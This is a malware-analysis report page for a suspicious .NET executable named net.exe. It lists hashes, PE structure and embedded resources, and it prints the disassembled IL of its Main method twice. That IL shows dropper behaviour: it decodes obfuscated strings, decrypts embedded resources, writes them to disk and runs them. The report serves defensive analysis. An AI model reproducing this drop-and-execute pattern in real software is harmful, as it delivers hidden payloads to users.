Suspicious
Suspect

9982fc296f41d48d7969be88650e3889

PE Executable
|
MD5: 9982fc296f41d48d7969be88650e3889
|
Size: 1.16 MB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Medium

Hash
 Hash Value
MD5
9982fc296f41d48d7969be88650e3889
Sha1
ac3eabbe4829f78769ea6505863330f7e57bc89d
Sha256
076bd8e03fc577eed02aab9a0b2849956286f94972f5a2334dc27e7e5df64fcd
Sha384
223d4f38787ca6c296d6e50020d16cec5b9f9602579d65574880987efcfa14c44afe63708768d7ae30e24219d8cecda5
Sha512
46a17402e6e66260ac9634d502ca399abac963ef49736f26af8cbe764f756e7f47e4c8e03ab4d9620ac98cc5190655c7905195d26bd8d0ab3ea5e30f4de871fc
SSDeep
24576:eP8IyEKEw10N8qHdADdxyuUEBlqkVT9RKUJbW4xcVFvi1Av9E+:kFKEC0NSHyuVbVT9RKU84u9nV
TLSH
404533C2CB7B7409D008357A22F742C2268875114726D92B7EEE92F8B5972775C63B3B

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
9982fc296f41d48d7969be88650e3889
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
bzqwxvdswlrqgbti.Resources
uaxxqlldtlkfvmrn
yrhrabrvdlcevahh
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Module Name

net.exe
Full Name

net.exe
EntryPoint

System.Void nwmzhlnvuryullcsusdltzbdxh.nwmzhlnvuryullcsusdltzbdxh::Main()
Scope Name

net.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

net
Assembly Version

0.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

15
Main Method

System.Void nwmzhlnvuryullcsusdltzbdxh.nwmzhlnvuryullcsusdltzbdxh::Main()
Main IL Instruction Count

115
Main IL

ldc.i4.2 <null> newarr System.String[] stloc.s V_4 ldloc.s V_4 ldc.i4.0 <null> ldc.i4.4 <null> newarr System.String stloc.s V_5 ldloc.s V_5 ldc.i4.0 <null> ldstr ULVc1y945SMpuQq6vx84UQ== stelem.ref <null> ldloc.s V_5 ldc.i4.1 <null> ldstr /Y7gpSBCK9MZfdb49URzDw== stelem.ref <null> ldloc.s V_5 ldc.i4.2 <null> ldstr yrhrabrvdlcevahh stelem.ref <null> ldloc.s V_5 ldc.i4.3 <null> ldstr LvfQWMVHsXBofEwXhFswqA== stelem.ref <null> ldloc.s V_5 stelem.ref <null> ldloc.s V_4 ldc.i4.1 <null> ldc.i4.4 <null> newarr System.String stloc.s V_6 ldloc.s V_6 ldc.i4.0 <null> ldstr ULVc1y945SMpuQq6vx84UQ== stelem.ref <null> ldloc.s V_6 ldc.i4.1 <null> ldstr uDrbTHnJ8hF2CITH9Cxehg== stelem.ref <null> ldloc.s V_6 ldc.i4.2 <null> ldstr uaxxqlldtlkfvmrn stelem.ref <null> ldloc.s V_6 ldc.i4.3 <null> ldstr LvfQWMVHsXBofEwXhFswqA== stelem.ref <null> ldloc.s V_6 stelem.ref <null> ldloc.s V_4 stloc.0 <null> ldstr bzqwxvdswlrqgbti call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() newobj System.Void System.Resources.ResourceManager::.ctor(System.String,System.Reflection.Assembly) stloc.1 <null> ldc.i4.0 <null> stloc.2 <null> br.s IL_00FB: ldloc.2 ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.0 <null> ldelem.ref <null> ldstr mbHS7JoCj1V/oNtOdQjBr+ED37Cg8J+Q1UmO1RLBxCs= call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_00A5: call System.String System.IO.Directory::GetCurrentDirectory() ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.0 <null> ldelem.ref <null> call System.String nwmzhlnvuryullcsusdltzbdxh.nwmzhlnvuryullcsusdltzbdxh::iwylqbxaqruvdnumlqbxnnx(System.String) call System.String System.Environment::GetEnvironmentVariable(System.String) br.s IL_00AA: ldloc.0 call System.String System.IO.Directory::GetCurrentDirectory() ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.1 <null> ldelem.ref <null> call System.String nwmzhlnvuryullcsusdltzbdxh.nwmzhlnvuryullcsusdltzbdxh::iwylqbxaqruvdnumlqbxnnx(System.String) call System.String System.IO.Path::Combine(System.String,System.String) stloc.3 <null> ldloc.3 <null> ldloc.1 <null> ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.2 <null> ldelem.ref <null> callvirt System.Object System.Resources.ResourceManager::GetObject(System.String) castclass System.Byte[] call System.Byte[] nwmzhlnvuryullcsusdltzbdxh.nwmzhlnvuryullcsusdltzbdxh::nujbzvwnawgnvvktrymxlwdacefrtwwbhuc(System.Byte[]) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.3 <null> ldelem.ref <null> call System.String nwmzhlnvuryullcsusdltzbdxh.nwmzhlnvuryullcsusdltzbdxh::iwylqbxaqruvdnumlqbxnnx(System.String) ldstr LvfQWMVHsXBofEwXhFswqA== call System.String nwmzhlnvuryullcsusdltzbdxh.nwmzhlnvuryullcsusdltzbdxh::iwylqbxaqruvdnumlqbxnnx(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_00F7: ldloc.2 ldloc.3 <null> call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> ldloc.2 <null> ldc.i4.1 <null> add <null> stloc.2 <null> ldloc.2 <null> ldc.i4.2 <null> blt.s IL_0083: ldloc.0 ret <null>
Module Name

net.exe
Full Name

net.exe
EntryPoint

System.Void nwmzhlnvuryullcsusdltzbdxh.nwmzhlnvuryullcsusdltzbdxh::Main()
Scope Name

net.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

net
Assembly Version

0.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

15
Main Method

System.Void nwmzhlnvuryullcsusdltzbdxh.nwmzhlnvuryullcsusdltzbdxh::Main()
Main IL Instruction Count

115
Main IL

ldc.i4.2 <null> newarr System.String[] stloc.s V_4 ldloc.s V_4 ldc.i4.0 <null> ldc.i4.4 <null> newarr System.String stloc.s V_5 ldloc.s V_5 ldc.i4.0 <null> ldstr ULVc1y945SMpuQq6vx84UQ== stelem.ref <null> ldloc.s V_5 ldc.i4.1 <null> ldstr /Y7gpSBCK9MZfdb49URzDw== stelem.ref <null> ldloc.s V_5 ldc.i4.2 <null> ldstr yrhrabrvdlcevahh stelem.ref <null> ldloc.s V_5 ldc.i4.3 <null> ldstr LvfQWMVHsXBofEwXhFswqA== stelem.ref <null> ldloc.s V_5 stelem.ref <null> ldloc.s V_4 ldc.i4.1 <null> ldc.i4.4 <null> newarr System.String stloc.s V_6 ldloc.s V_6 ldc.i4.0 <null> ldstr ULVc1y945SMpuQq6vx84UQ== stelem.ref <null> ldloc.s V_6 ldc.i4.1 <null> ldstr uDrbTHnJ8hF2CITH9Cxehg== stelem.ref <null> ldloc.s V_6 ldc.i4.2 <null> ldstr uaxxqlldtlkfvmrn stelem.ref <null> ldloc.s V_6 ldc.i4.3 <null> ldstr LvfQWMVHsXBofEwXhFswqA== stelem.ref <null> ldloc.s V_6 stelem.ref <null> ldloc.s V_4 stloc.0 <null> ldstr bzqwxvdswlrqgbti call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() newobj System.Void System.Resources.ResourceManager::.ctor(System.String,System.Reflection.Assembly) stloc.1 <null> ldc.i4.0 <null> stloc.2 <null> br.s IL_00FB: ldloc.2 ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.0 <null> ldelem.ref <null> ldstr mbHS7JoCj1V/oNtOdQjBr+ED37Cg8J+Q1UmO1RLBxCs= call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_00A5: call System.String System.IO.Directory::GetCurrentDirectory() ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.0 <null> ldelem.ref <null> call System.String nwmzhlnvuryullcsusdltzbdxh.nwmzhlnvuryullcsusdltzbdxh::iwylqbxaqruvdnumlqbxnnx(System.String) call System.String System.Environment::GetEnvironmentVariable(System.String) br.s IL_00AA: ldloc.0 call System.String System.IO.Directory::GetCurrentDirectory() ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.1 <null> ldelem.ref <null> call System.String nwmzhlnvuryullcsusdltzbdxh.nwmzhlnvuryullcsusdltzbdxh::iwylqbxaqruvdnumlqbxnnx(System.String) call System.String System.IO.Path::Combine(System.String,System.String) stloc.3 <null> ldloc.3 <null> ldloc.1 <null> ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.2 <null> ldelem.ref <null> callvirt System.Object System.Resources.ResourceManager::GetObject(System.String) castclass System.Byte[] call System.Byte[] nwmzhlnvuryullcsusdltzbdxh.nwmzhlnvuryullcsusdltzbdxh::nujbzvwnawgnvvktrymxlwdacefrtwwbhuc(System.Byte[]) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.3 <null> ldelem.ref <null> call System.String nwmzhlnvuryullcsusdltzbdxh.nwmzhlnvuryullcsusdltzbdxh::iwylqbxaqruvdnumlqbxnnx(System.String) ldstr LvfQWMVHsXBofEwXhFswqA== call System.String nwmzhlnvuryullcsusdltzbdxh.nwmzhlnvuryullcsusdltzbdxh::iwylqbxaqruvdnumlqbxnnx(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_00F7: ldloc.2 ldloc.3 <null> call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> ldloc.2 <null> ldc.i4.1 <null> add <null> stloc.2 <null> ldloc.2 <null> ldc.i4.2 <null> blt.s IL_0083: ldloc.0 ret <null>
9982fc296f41d48d7969be88650e3889 (1.16 MB)
File Structure
9982fc296f41d48d7969be88650e3889
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
bzqwxvdswlrqgbti.Resources
uaxxqlldtlkfvmrn
yrhrabrvdlcevahh
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙